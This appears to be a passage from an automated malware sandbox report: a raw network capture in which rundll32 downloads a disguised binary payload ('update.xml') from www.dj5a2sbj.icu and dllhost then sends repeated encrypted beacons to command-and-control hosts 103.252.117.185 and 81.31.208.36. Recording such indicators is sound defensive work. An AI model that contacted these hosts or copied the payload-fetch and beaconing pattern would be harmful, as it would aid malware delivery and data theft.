                  Dec 19, 2024 14:49:57.315522909 CET4998380192.168.2.6103.252.117.185
                  Dec 19, 2024 14:49:57.583758116 CET4998380192.168.2.6103.252.117.185
                  Dec 19, 2024 14:49:57.703350067 CET8049983103.252.117.185192.168.2.6
                  Dec 19, 2024 14:50:19.229296923 CET8049983103.252.117.185192.168.2.6
                  Dec 19, 2024 14:50:19.229412079 CET4998380192.168.2.6103.252.117.185
                  Dec 19, 2024 14:50:19.229501009 CET4998380192.168.2.6103.252.117.185
                  Dec 19, 2024 14:50:22.352173090 CET5002880192.168.2.6103.252.117.185
                  Dec 19, 2024 14:50:22.471791983 CET8050028103.252.117.185192.168.2.6
                  Dec 19, 2024 14:50:22.471900940 CET5002880192.168.2.6103.252.117.185
                  Dec 19, 2024 14:50:22.851425886 CET5002880192.168.2.6103.252.117.185
                  Dec 19, 2024 14:50:22.971127987 CET8050028103.252.117.185192.168.2.6
                  Dec 19, 2024 14:50:34.179212093 CET80814973681.31.208.36192.168.2.6
                  Dec 19, 2024 14:50:34.226140022 CET497368081192.168.2.681.31.208.36
                  Dec 19, 2024 14:50:35.994484901 CET497368081192.168.2.681.31.208.36
                  Dec 19, 2024 14:50:36.114238024 CET80814973681.31.208.36192.168.2.6
                  Dec 19, 2024 14:50:44.401691914 CET8050028103.252.117.185192.168.2.6
                  Dec 19, 2024 14:50:44.401818037 CET5002880192.168.2.6103.252.117.185
                  Dec 19, 2024 14:50:44.401987076 CET5002880192.168.2.6103.252.117.185
                  Dec 19, 2024 14:50:47.523968935 CET5002980192.168.2.6103.252.117.185
                  Dec 19, 2024 14:50:47.644433022 CET8050029103.252.117.185192.168.2.6
                  Dec 19, 2024 14:50:47.644522905 CET5002980192.168.2.6103.252.117.185
                  Dec 19, 2024 14:50:47.892507076 CET5002980192.168.2.6103.252.117.185
                  Dec 19, 2024 14:50:48.012280941 CET8050029103.252.117.185192.168.2.6
                  Dec 19, 2024 14:51:09.558273077 CET8050029103.252.117.185192.168.2.6
                  Dec 19, 2024 14:51:09.558362007 CET5002980192.168.2.6103.252.117.185
                  Dec 19, 2024 14:51:09.562952042 CET5002980192.168.2.6103.252.117.185
                  Dec 19, 2024 14:51:12.680397987 CET5003080192.168.2.6103.252.117.185
                  Dec 19, 2024 14:51:12.800086021 CET8050030103.252.117.185192.168.2.6
                  Dec 19, 2024 14:51:12.800262928 CET5003080192.168.2.6103.252.117.185
                  Dec 19, 2024 14:51:13.058628082 CET5003080192.168.2.6103.252.117.185
                  Dec 19, 2024 14:51:13.178850889 CET8050030103.252.117.185192.168.2.6
                  Dec 19, 2024 14:51:19.204983950 CET80814973681.31.208.36192.168.2.6
                  Dec 19, 2024 14:51:19.257468939 CET497368081192.168.2.681.31.208.36
                  Dec 19, 2024 14:51:22.417248964 CET497368081192.168.2.681.31.208.36
                  Dec 19, 2024 14:51:22.537130117 CET80814973681.31.208.36192.168.2.6
                  Dec 19, 2024 14:51:34.715210915 CET8050030103.252.117.185192.168.2.6
                  Dec 19, 2024 14:51:34.715389013 CET5003080192.168.2.6103.252.117.185
                  Dec 19, 2024 14:51:34.715435982 CET5003080192.168.2.6103.252.117.185
                  Dec 19, 2024 14:51:37.836504936 CET5003180192.168.2.6103.252.117.185
                  Dec 19, 2024 14:51:37.956311941 CET8050031103.252.117.185192.168.2.6
                  Dec 19, 2024 14:51:37.956542015 CET5003180192.168.2.6103.252.117.185
                  Dec 19, 2024 14:51:38.220865011 CET5003180192.168.2.6103.252.117.185
                  Dec 19, 2024 14:51:38.340609074 CET8050031103.252.117.185192.168.2.6
                  Dec 19, 2024 14:51:38.340667963 CET8050031103.252.117.185192.168.2.6
                  Dec 19, 2024 14:52:00.244923115 CET8050031103.252.117.185192.168.2.6
                  Dec 19, 2024 14:52:00.245913982 CET8050031103.252.117.185192.168.2.6
                  Dec 19, 2024 14:52:00.246069908 CET5003180192.168.2.6103.252.117.185
                  Dec 19, 2024 14:52:00.249568939 CET5003180192.168.2.6103.252.117.185
                  Dec 19, 2024 14:52:03.367857933 CET5003280192.168.2.6103.252.117.185
                  Dec 19, 2024 14:52:03.487566948 CET8050032103.252.117.185192.168.2.6
                  Dec 19, 2024 14:52:03.488095045 CET5003280192.168.2.6103.252.117.185
                  Dec 19, 2024 14:52:03.693825960 CET5003280192.168.2.6103.252.117.185
                  Dec 19, 2024 14:52:03.814546108 CET8050032103.252.117.185192.168.2.6
                  Dec 19, 2024 14:52:04.301629066 CET80814973681.31.208.36192.168.2.6
                  Dec 19, 2024 14:52:04.351360083 CET497368081192.168.2.681.31.208.36
                  Dec 19, 2024 14:52:08.887979984 CET497368081192.168.2.681.31.208.36
                  Dec 19, 2024 14:52:09.008404970 CET80814973681.31.208.36192.168.2.6
                  TimestampSource PortDest PortSource IPDest IP
                  Dec 19, 2024 14:48:11.180367947 CET6071953192.168.2.61.1.1.1
                  Dec 19, 2024 14:48:11.491463900 CET53607191.1.1.1192.168.2.6
                  Dec 19, 2024 14:48:16.128643036 CET5212853192.168.2.61.1.1.1
                  Dec 19, 2024 14:48:16.544238091 CET53521281.1.1.1192.168.2.6
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Dec 19, 2024 14:48:11.180367947 CET192.168.2.61.1.1.10xd555Standard query (0)www.dj5a2sbj.icuA (IP address)IN (0x0001)false
                  Dec 19, 2024 14:48:16.128643036 CET192.168.2.61.1.1.10x1977Standard query (0)api.mods4ws.meA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Dec 19, 2024 14:48:11.491463900 CET1.1.1.1192.168.2.60xd555No error (0)www.dj5a2sbj.icu104.21.40.214A (IP address)IN (0x0001)false
                  Dec 19, 2024 14:48:11.491463900 CET1.1.1.1192.168.2.60xd555No error (0)www.dj5a2sbj.icu172.67.188.99A (IP address)IN (0x0001)false
                  Dec 19, 2024 14:48:16.544238091 CET1.1.1.1192.168.2.60x1977No error (0)api.mods4ws.me103.252.117.185A (IP address)IN (0x0001)false
                  • www.dj5a2sbj.icu
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.649742103.252.117.185807220C:\Windows\SysWOW64\dllhost.exe
                  TimestampBytes transferredDirectionData
                  Dec 19, 2024 14:48:17.124227047 CET807OUTData Raw: 17 00 00 00 27 03 00 00 ea 40 10 07 01 37 7b a6 30 2f 5e d2 93 f4 40 17 60 35 4d c2 72 9e 13 be 43 db 00 c9 7e 98 a4 11 fd 8f e0 7f 99 75 60 50 85 7c c1 7a 7f f2 35 d7 cd f8 30 b1 b7 ef e3 bf 22 94 2b e1 9b 18 c4 e0 98 f1 14 38 f8 d9 cd b0 94 d8
                  Data Ascii: '@7{0/^@`5MrC~u`P|z50"+8-X>|?=w4R( UKwh+PShAgn*._^r]]IkH@x_8. aV ;s{vNIqOJL]l|yx|8#J<#9T


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.649806103.252.117.185807220C:\Windows\SysWOW64\dllhost.exe
                  TimestampBytes transferredDirectionData
                  Dec 19, 2024 14:48:42.487770081 CET1063OUTData Raw: 17 01 00 00 27 04 00 00 3b 98 06 70 92 2d 2b 23 66 7d dd 76 ee a5 a5 fc 26 20 6b 53 49 cd b1 06 4c 0e ed 49 7a 23 2e cb e8 43 d1 a1 e8 b9 25 35 b3 ff 55 ed 53 64 90 1b eb d6 f8 38 73 29 5b ab f2 18 1c 0b 6c ff 2a cf 94 1c ef 81 dc 54 51 62 53 f7
                  Data Ascii: ';p-+#f}v& kSILIz#.C%5USd8s)[l*TQbS+.j::,d'yHMi"7~m}sm!p8;s\'AM!qjaX%IZKB1hJ~Zdk*+'*Hq/\tkK


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.649869103.252.117.185807220C:\Windows\SysWOW64\dllhost.exe
                  TimestampBytes transferredDirectionData
                  Dec 19, 2024 14:49:07.415564060 CET1021OUTData Raw: ed 00 00 00 fd 03 00 00 c2 15 e4 94 73 7b fe 77 02 ad 3f b0 c0 88 3b 23 e7 ec 25 91 92 45 cf 7e 95 0d 74 7b bf 99 29 7e 73 37 4e 66 a7 34 71 c6 fc aa 0a ec e7 65 8f d7 c7 79 b8 e4 c1 49 b8 d2 f9 55 5c 69 0f 37 21 ad ac 92 3a 16 5e da 89 ec f8 72
                  Data Ascii: s{w?;#%E~t{)~s7Nf4qeyIU\i7!:^ra$lDQ0gXQq0f0]1l]+#"9Nk.tBu={|\4JIKrCJt-"&,E0l@KRUP+pF


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.649923103.252.117.185807220C:\Windows\SysWOW64\dllhost.exe
                  TimestampBytes transferredDirectionData
                  Dec 19, 2024 14:49:32.535643101 CET1171OUTData Raw: 83 01 00 00 93 04 00 00 04 11 7d f6 bc 11 96 fd 9c 45 0f 31 2b aa ba d1 e1 ee ef 1b 72 a9 21 c8 8d 21 99 4e 21 48 30 01 3d 02 89 0f d1 08 b9 a6 66 74 15 07 75 3a 77 45 49 57 d0 41 ab 4c 8f 12 08 36 c4 2d d4 87 e3 89 af 9e f2 59 2d db 5a 6f 33 5d
                  Data Ascii: }E1+r!!N!H0=ftu:wEIWAL6-Y-Zo3]u\k(MoZGlnE)glqHwKiP6#{jG@YnKpO;X{H)}7$s{I Ck$WU1V/t!}IGC'!KB~m


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.649983103.252.117.185807220C:\Windows\SysWOW64\dllhost.exe
                  TimestampBytes transferredDirectionData
                  Dec 19, 2024 14:49:57.583758116 CET902OUTData Raw: 76 00 00 00 86 03 00 00 68 41 f3 94 42 63 0a 9f d1 d1 42 4d ca 27 b2 a4 0a 4f 99 6a 0b 90 03 04 24 9d 16 7e f5 2c 1f 13 42 0a e3 54 39 19 81 67 aa f1 b3 4d f2 86 85 24 60 80 7f 62 04 89 6a 55 6b 2e 9e 96 88 e3 bf a3 ee 62 f8 3d 55 5a 6a 37 33 a3
                  Data Ascii: vhABcBM'Oj$~,BT9gM$`bjUk.b=UZj73'h@b3>ISZdgOf|hJtF`Z.I6aZ<o*&J#iq~p.BTXErO$,NEVk.EBzcb5;Bf#h@bISZdgOf|hJN`?\I6=


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.650028103.252.117.185807220C:\Windows\SysWOW64\dllhost.exe
                  TimestampBytes transferredDirectionData
                  Dec 19, 2024 14:50:22.851425886 CET1203OUTData Raw: a3 01 00 00 b3 04 00 00 2f 89 1d ac 8b 28 cd f4 c4 69 0f 29 11 8c a4 4d ee c5 b1 c8 9a 0e eb d3 72 34 27 ca 9a 30 be 23 fc 24 a8 1a 6c 12 d7 12 56 7e a9 36 c5 92 71 a5 1c bc 14 a5 59 49 16 fd 29 86 5a 32 61 88 36 98 16 72 4c dd a5 25 c2 44 4d 45
                  Data Ascii: /(i)Mr4'0#$lV~6qYI)Z2a6rL%DME?~HW}a6uI|>zf @UYB|XbJk-V($&P4mx']6@~R:j@h6vURJY;zzHL*vC'M-j7_0t'


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.650029103.252.117.185807220C:\Windows\SysWOW64\dllhost.exe
                  TimestampBytes transferredDirectionData
                  Dec 19, 2024 14:50:47.892507076 CET975OUTData Raw: bf 00 00 00 cf 03 00 00 82 1c ce 16 5e 2c e0 c6 2d 4e 21 dd 5d 8b a1 3c 26 1e cf ea 1c 58 32 47 23 e8 3f 6d 48 69 4d e5 a4 60 63 cf c3 d5 58 5c 6d 89 09 ea 32 bd fa df ec c8 b4 ab 32 be bc 84 b3 d5 b7 d0 e0 ef 68 01 6d 24 44 bb 82 f0 21 31 c6 66
                  Data Ascii: ^,-N!]<&X2G#?mHiM`cX\m22hm$D!1fK4.S^&&|8=QWdI[DO7qj:=Z=}[4uLLYI[7%cVOJ]tmqz V2eKrC?m5|`cm+


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.650030103.252.117.185807220C:\Windows\SysWOW64\dllhost.exe
                  TimestampBytes transferredDirectionData
                  Dec 19, 2024 14:51:13.058628082 CET1233OUTData Raw: c1 01 00 00 d1 04 00 00 e1 be 80 e5 de 4e 94 d9 10 a5 a8 ee 78 2f b0 42 ad 59 3a 60 73 7b 07 4b 0a 63 fe c7 0d 9b 53 01 51 64 55 75 ea b6 a2 04 77 48 ce 44 b9 0f df c0 ca f9 2b 44 6e 49 34 72 aa 5f a9 bb 91 bc c3 f1 7c cd d7 e7 5d fa 32 c1 ea e2
                  Data Ascii: Nx/BY:`s{KcSQdUuwHD+DnI4r_|]21i)D{9kuQyk;UotT)<)0s=QO:GF2ER2 .o'Tp^mX_t)6wL]`2>B/b&K)+!


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.650031103.252.117.185807220C:\Windows\SysWOW64\dllhost.exe
                  TimestampBytes transferredDirectionData
                  Dec 19, 2024 14:51:38.220865011 CET1270OUTData Raw: e6 01 00 00 f6 04 00 00 5c c7 dc d9 ad b0 88 89 9f 23 49 a9 ff de 34 14 23 84 2c f9 4a f4 14 9e a0 77 69 63 22 b3 7c 13 56 ee ac 9d 9f 70 39 e5 01 2d 07 05 b6 88 8d 89 37 59 7a 1a 7a af a0 31 d7 72 73 5d f3 2b 01 02 cf d2 da 51 a6 68 5e 47 a6 7f
                  Data Ascii: \#I4#,Jwic"|Vp9-7Yzz1rs]+Qh^G{aE:TKFGeY-Kkmc;+6~\K`,{M&Mf9|wEkn[xWX`}><ZNvbm8b1j


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.650032103.252.117.185807220C:\Windows\SysWOW64\dllhost.exe
                  TimestampBytes transferredDirectionData
                  Dec 19, 2024 14:52:03.693825960 CET1236OUTData Raw: c4 01 00 00 d4 04 00 00 d5 c0 77 3e 61 04 be 29 a1 5e 89 2c 24 1a 30 6b da 65 a7 2e 16 27 ed 3d b1 bd 78 ca 57 a2 f4 84 b7 01 4e 7b 09 08 5e e1 fa e7 03 f7 c4 b0 0f ec c2 6b 9a 93 27 75 c5 b6 62 59 2c b1 cb b8 4b 5c e6 7e e5 c1 80 48 df 2d ca fd
                  Data Ascii: w>a)^,$0ke.'=xWN{^k'ubY,K\~H-S"dW1Yf+?Jx:pPpp^4pF)',3Jzy|\Bb_R9?0$BA%oc@(<'4Z[]\ 5w\s25? l[


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.649725104.21.40.2144435632C:\Windows\SysWOW64\rundll32.exe
                  TimestampBytes transferredDirectionData
                  2024-12-19 13:48:12 UTC68OUTGET /yj/update.xml HTTP/1.1
                  Host: www.dj5a2sbj.icu
                  Accept: */*
                  2024-12-19 13:48:13 UTC857INHTTP/1.1 200 OK
                  Date: Thu, 19 Dec 2024 13:48:13 GMT
                  Content-Type: text/xml
                  Content-Length: 320512
                  Connection: close
                  Last-Modified: Sun, 15 Dec 2024 02:29:11 GMT
                  ETag: "675e3ef7-4e400"
                  Accept-Ranges: bytes
                  cf-cache-status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=60npSsSlUlrp7eaDWq%2B8hC26EOIyvUBwJUheGO9%2FHdWq1fu%2FawVrCGRkbdoDJO4GKtNDTvOlMgCB0ez4LZLfSlTomng3MpjstOx9PPDI1ylD1AH5W7nSrhoj087ffzldCwzh"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8f47d9557e3743ad-EWR
                  alt-svc: h3=":443"; ma=86400
                  server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1596&rtt_var=607&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=706&delivery_rate=1789215&cwnd=203&unsent_bytes=0&cid=f9682c34de58bf81&ts=875&x=0"
                  2024-12-19 13:48:13 UTC512INData Raw: 28 a9 62 b7 f0 dc 23 d2 c5 a4 e7 83 c2 45 95 3d 09 a5 20 1e ae f5 1e 4a 14 cb 38 85 1e 36 36 57 30 4f 47 bb b8 e2 88 c2 e6 e9 79 08 bd b2 d0 2e 2d 75 ee e4 f6 03 05 0b 9d bf c6 c2 87 a1 c1 3c 17 fd 24 58 53 ad 5e 29 49 89 7a a0 fc a9 89 a8 82 3f b6 7c a2 4a d7 d7 2b 4c ab 40 8a 53 2d 7f b9 7b a5 46 ab ef 0b 32 21 ad e5 1c 32 8c 26 33 b3 8c b3 73 f6 9c 14 a0 ad 84 37 91 ca 53 e5 a1 6f 54 38 d1 41 9a 5a aa 66 7f d0 16 3a e1 b6 43 58 37 4b be b1 10 0d d0 73 80 9e 76 0a da 3e c6 26 fe d4 03 58 0b ba dc 95 80 22 80 92 35 73 9f e6 a6 48 0a 45 52 6b e4 5e 93 00 b3 46 43 ed 99 86 a4 79 41 d0 54 de 34 31 0c 3c 55 ea e3 0c 13 9f db 58 ee 56 25 c7 0f 81 a5 b3 57 ce dd cc 15 02 d0 5b 57 d2 c1 ad 05 ad 4f 5a 6b 62 61 b6 86 5c f9 71 8f 94 18 d0 ba 08 bb c1 28 5e 3d a8
                  Data Ascii: (b#E= J866W0OGy.-u<$XS^)Iz?|J+L@S-{F2!2&3s7SoT8AZf:CX7Ksv>&X"5sHERk^FCyAT41<UXV%W[WOZkba\q(^=
                  2024-12-19 13:48:13 UTC1369INData Raw: 38 5e 9d 4d 14 2c 5a d6 f6 eb 4a 89 f4 4e 6c 51 f5 2f 93 a1 2a e8 60 ad a7 7f 2b 14 9b 57 a0 d4 ca 24 cb 34 21 c4 aa 0e 83 bc 8e bb 9e 59 ce a0 f2 42 cb 8b 1d 9e 7a 03 5f 0d 1b 10 eb e1 7c 4e f5 e6 6d 53 66 56 d1 87 16 dd 72 b2 3f 2f 01 e2 b6 47 7d 1d d7 79 bc 5c bf d7 c4 b4 84 f7 c3 57 48 c7 79 66 e7 12 11 41 d6 a0 2b 80 1d 65 8e c7 49 36 cd d9 9c a8 3d 82 22 4e 2b c1 8b d2 30 64 d4 00 80 21 82 29 22 1b b1 4b ae 5c 99 c0 f5 fa b1 71 48 7d ef 2b f6 db df 3d d1 b7 76 7e 5e 55 e0 c1 09 b6 f8 c2 82 4b ba f1 e4 7d 9d 72 df e9 3e 0c 52 7a f5 83 2d 28 ad 73 87 08 78 ea 6d f9 4f 63 da 5d 36 84 fe e9 bc 20 70 07 ec 15 73 12 ef 06 26 ad 4f 33 59 ff fe de ae 50 d0 78 54 71 9c 36 9a 97 45 75 a6 42 ae b1 89 8a e1 cc e3 b3 ae 20 c4 21 6d 3c fc 92 da db 92 8d 31 cb 53
                  Data Ascii: 8^M,ZJNlQ/*`+W$4!YBz_|NmSfVr?/G}y\WHyfA+eI6="N+0d!)"K\qH}+=v~^UK}r>Rz-(sxmOc]6 ps&O3YPxTq6EuB !m<1S
                  2024-12-19 13:48:13 UTC1369INData Raw: d4 4e ed f1 18 5f 5c 3a 58 5e 1d a1 2e 1d a1 56 60 ad f3 a8 89 64 c7 18 34 fe 0d 7d 2c cf 0b 1e 05 5d 9b 8f 32 a2 b6 c6 a4 6c db 35 b5 86 9e 7f c9 b3 1d 58 5c ad 3e b1 99 6b ca b1 8d a6 1f 35 cc d0 41 46 0a ed 07 d4 0e 8e c2 9a 43 16 7b 92 d4 22 43 f8 a4 73 65 8a ab f6 ad 0c 9c 86 02 8a 42 f4 91 c6 4d df 7f bb c5 00 53 89 85 4f 1a fe 8f 0b 57 2e db f1 b1 f0 9f 9a 45 bf 17 de 8f 06 cc 42 31 a8 c2 28 f9 b2 b1 d0 84 f0 d9 ad cf 22 b5 6b 64 c7 48 e1 df d8 e5 2e 4a 89 60 cf 00 ae bc 0f 4f c4 d2 03 85 37 2f 56 46 92 34 5c a1 e4 4f d7 48 e5 38 cc 86 1c 98 5e 31 b1 86 bf 0b bc b8 14 66 6f 9b dc b1 17 08 9a 6f f0 5b 95 2a 08 3b 93 9d 73 36 8f e6 63 5e aa a5 0e 64 d8 f2 f5 b8 ed 2d 23 45 de f5 29 d9 c4 91 98 f2 65 9e ee f5 6e 9f 35 2d cb 7a a3 46 d0 14 31 eb 0a 7d
                  Data Ascii: N_\:X^.V`d4},]2l5X\>k5AFC{"CseBMSOW.EB1("kdH.J`O7/VF4\OH8^1foo[*;s6c^d-#E)en5-zF1}
                  2024-12-19 13:48:13 UTC1369INData Raw: 62 dc 32 eb c1 38 c0 a3 08 3d 65 2c 06 3b 5c dc 2f cf 16 51 9a 03 73 13 2e c5 e5 0a 56 82 17 45 d1 dc 01 9e 2d 19 20 fc 41 c8 24 72 e4 63 30 74 dc a0 a6 80 4a 16 4d 1a d9 38 05 ff ef 32 6b 94 4f c5 95 de 7d 9e 9e 0f fd 33 e0 7b 41 de 20 73 bd 61 fd af e5 88 47 0e af 5b 97 37 b4 d1 b5 4f 64 c9 84 3d 98 c2 37 a9 35 9f 6a 75 f0 e4 4e 9a d5 9a 8f a8 6d ff de 59 4f 7a 30 be 02 10 b2 ea 54 d5 05 90 da f2 94 64 19 67 3f 68 9f 7d 05 80 30 af 84 85 3e 09 e2 68 30 0f 5a 86 f0 72 1e c5 96 05 a4 92 28 70 88 a3 26 81 2c e1 d6 64 64 4c 18 5c ab c7 6a e0 7c c0 2b 70 4d 51 07 f9 f3 35 8f 26 bb 07 91 fe 97 5c 10 ed 0e 44 5e aa 4a d3 8b f1 9c 96 d4 d9 f9 87 24 2d 87 f6 f4 56 65 b9 f0 36 e6 28 52 86 30 4c cf 39 19 ba 89 ac 50 48 78 3e 3c c3 6d 29 17 4a ff b6 57 cb d0 44 98
                  Data Ascii: b28=e,;\/Qs.VE- A$rc0tJM82kO}3{A saG[7Od=75juNmYOz0Tdg?h}0>h0Zr(p&,ddL\j|+pMQ5&\D^J$-Ve6(R0L9PHx><m)JWD
                  2024-12-19 13:48:13 UTC1369INData Raw: eb b7 86 a1 24 3a 52 77 59 28 4a 18 72 a6 4b 6d c0 1f 87 ff 0a b0 ba e0 aa 80 07 df e8 ac 1c 59 30 32 18 a2 41 df ef c6 92 ad 52 47 d3 4e 21 66 c2 b5 8f 25 ff 2d 10 35 f7 a5 78 c9 36 3d 1a 59 bf 30 d2 54 03 e5 c3 b9 b2 7d 04 58 6c 28 f6 c4 1a 8a b8 4a d7 a8 f5 fd 1b e1 0c 43 29 ac a0 eb cf ba d7 f2 88 a3 bf e1 ea eb e1 71 8d f2 a0 64 17 fd 51 bd bb 36 fe de c4 3d c4 8b 72 f0 c9 66 45 91 f0 95 17 89 aa ac f1 bd c5 d6 ec 99 96 2a 01 74 86 42 45 a2 d6 00 0f 4b 7c 86 3c 3b 83 72 a0 65 be e9 3b ab 3d 99 cb cb 37 66 5b ef e2 82 05 aa 6a a5 9c ba a0 85 03 2f 13 f4 fd ed 19 14 53 05 9e 19 88 b2 94 5f e8 ee 83 0a a4 70 fa f2 6d 16 01 84 4d a1 fb 23 24 b3 d0 8a e4 2d 4f e1 b7 ad b4 28 ca 86 48 29 3e 34 8a 3d 2f ce 1e ad 73 1f 6b 23 31 a6 e1 2e 4f cc 47 48 8b 26 61
                  Data Ascii: $:RwY(JrKmY02ARGN!f%-5x6=Y0T}Xl(JC)qdQ6=rfE*tBEK|<;re;=7f[j/S_pmM#$-O(H)>4=/sk#1.OGH&a
                  2024-12-19 13:48:13 UTC1369INData Raw: 17 c0 ce 7a f0 a4 4b 57 b6 7f 63 30 e2 0c a5 b4 73 c1 bc 60 41 a8 43 1c 39 32 ce 37 39 d0 a1 b1 d4 4c 96 43 98 7e 81 3d 2c 18 35 b2 56 66 89 dc 24 e2 6c f2 c8 45 0f 1e 76 71 e0 0a ff 42 32 1a 92 38 24 45 cf 93 4c 04 57 e9 c9 c9 42 61 58 60 32 b1 3b 77 d4 e5 ef 30 ff a5 b2 dd e4 37 2a 2d eb e2 5f df 80 37 74 1a 6d fb 9e 11 d4 46 56 13 a8 4a 69 59 2e 3c 71 ca fd 44 46 00 60 96 86 c9 a5 c9 dc 05 ad c9 47 29 2b a7 52 db dc 85 fa fe e8 2b c6 88 50 2c c6 ea 9a ab 34 8a 5d 3e 1b ef 32 2c d2 d1 bf 55 20 5e 0a 19 f3 72 fd c7 07 50 30 fa c5 42 b3 35 67 0e e0 04 c7 c5 18 d4 27 fb b1 0d b9 27 9c f1 e9 a9 9c 44 89 1b 09 ee a4 af c5 40 0e 1a b9 00 9d bd 19 b8 2c 5b 4b 9f 69 8e 9c 22 be fc c7 b5 de 11 df b0 fa 01 7d 0f 13 0f f1 91 5d 9f 8b 5c aa a5 8b dc 44 25 46 32 14
                  Data Ascii: zKWc0s`AC9279LC~=,5Vf$lEvqB28$ELWBaX`2;w07*-_7tmFVJiY.<qDF`G)+R+P,4]>2,U ^rP0B5g''D@,[Ki"}]\D%F2
                  2024-12-19 13:48:13 UTC1369INData Raw: f4 0c af e5 75 cf 36 28 b6 ac af c2 4a 17 0c de 46 d0 d0 52 ff 94 12 b0 6b f1 6e 8e 61 9e 50 dd 40 12 d6 f1 67 ff ee 9d 3e 27 cc 95 0b fb d2 1b 08 1a 1a 1c f5 b3 b8 60 cc e5 f7 a4 63 dc 15 fa 76 68 09 a0 8b 58 87 96 0a fa a4 fc a5 d5 44 23 4b bc 06 81 82 84 67 b4 89 11 1d 67 77 59 9a 3f 70 f7 00 f7 44 d9 49 64 cb 21 1a 09 a5 44 38 5d eb 8a 86 83 53 1c b9 50 3f 66 9e 80 fb b5 fc f8 90 d0 4b 8a 68 08 6a d6 32 82 13 94 44 de 76 45 2f e7 46 21 02 30 51 90 89 33 bf 51 c0 83 fc a2 e5 22 ab 5b 8c b9 47 55 5d bc 8e 54 65 16 c6 0c 34 63 57 d4 84 d1 4e 36 ba 05 d5 88 56 f3 80 25 a4 ae 22 b2 1d 41 9c 13 a0 3a 8b a4 53 b5 f9 32 14 ab 4a 94 96 93 84 ef e8 1d 4a cb 4b 2e bc de 14 a0 8b c5 0e 75 86 8d 52 6b eb 35 5b ff 90 84 64 47 29 3c 38 a8 40 c1 2f 4d cd 2b 84 e3 e4
                  Data Ascii: u6(JFRknaP@g>'`cvhXD#KggwY?pDId!D8]SP?fKhj2DvE/F!0Q3Q"[GU]Te4cWN6V%"A:S2JJK.uRk5[dG)<8@/M+
                  2024-12-19 13:48:13 UTC1369INData Raw: dc 85 12 ea 6c b2 e6 2b a5 42 6d 04 17 4a 34 b2 94 df 07 29 58 df a6 cd a9 01 d5 1a c1 61 e6 b9 41 ed 55 3a d2 d2 4a b9 44 ff a4 e1 2d d7 e6 3a 4f 5f 07 5a 96 6f 9d b2 2e fb 05 84 07 9f 48 b9 0f 0d 29 45 dd 5d 2f 54 5d c6 bb 3d 1f 01 65 4a 32 e4 9b df 7a 89 77 5e 29 02 b4 35 e1 c4 44 09 78 0a f8 b5 a6 73 f1 d9 5b d4 61 87 31 cc a6 8c e6 f8 70 ed 9b 48 b4 c4 e1 b0 d9 ef 8b 43 7d 5a 15 a7 f3 62 46 72 8f 00 ff 80 cd 0f ba 7e 8a c2 f4 26 c9 1b 10 75 a8 fb 19 02 9b c9 0c 7b 7a be 13 40 33 f3 5f 4f 76 c2 65 47 2b 42 ab d0 98 e5 83 ad 9a 67 4c 21 97 bc a1 14 10 84 a1 0f 45 c7 47 d2 ff ee 9e b6 d4 27 ae 8c 6d a4 86 b8 38 67 4e 8d 3b d9 6d be cd 62 92 68 53 e6 ab a4 79 33 b2 de a1 35 a2 21 7b e8 72 2c cc a0 9d 08 30 d3 1f d1 dd 9a e6 12 bb 0f d4 bc ff 5b 85 9b 91
                  Data Ascii: l+BmJ4)XaAU:JD-:O_Zo.H)E]/T]=eJ2zw^)5Dxs[a1pHC}ZbFr~&u{z@3_OveG+BgL!EG'm8gN;mbhSy35!{r,0[
                  2024-12-19 13:48:13 UTC1369INData Raw: c7 7a a8 94 91 d1 d0 4e b0 e0 36 55 e7 ed df eb 27 29 99 71 88 3c b0 9a 4b 02 99 64 7e 1a 5d 40 22 21 a9 97 ed a4 5f d9 d8 cd 1c 8c 1a 26 3e d7 f4 ef 17 99 32 ac 69 81 cd a4 b2 a7 7c c8 a5 53 d2 dc 75 f5 64 00 3e 70 d9 a2 be bd 60 a1 88 2c ac 3b 21 b5 00 86 04 31 37 4e 37 33 99 1a 19 a0 06 10 7a e8 b8 51 2c 71 e7 6d 89 5c 7f 64 d1 7f e4 b4 ae 6d fe 7e ca 6e 73 ef 3c 52 73 ce 0e 0c 0f 4d bb 5c ba 88 04 47 17 63 79 3d aa be 5a 5f d0 97 13 62 28 03 fb 7b 74 04 7b c4 c7 79 59 a9 f0 b1 b7 cd e1 77 97 ca f5 08 f3 90 3d d4 5e 30 16 2d ab ef d3 82 50 a8 ac fb 71 c7 1f 35 e4 ec 45 96 e7 f1 7f 75 6e cb 39 42 15 c1 25 8b 88 33 9a 21 b8 ad cb 3f 7b 17 8b 0f 64 4d b3 ad 36 98 e3 d5 13 b4 df 12 ad 96 d2 2e 12 f9 6a 27 b8 8b eb 47 81 2d f2 76 de 4b c2 8e 39 d6 d6 56 01
                  Data Ascii: zN6U')q<Kd~]@"!_&>2i|Sud>p`,;!17N73zQ,qm\dm~ns<RsM\Gcy=Z_b({t{yYw=^0-Pq5Eun9B%3!?{dM6.j'G-vK9V
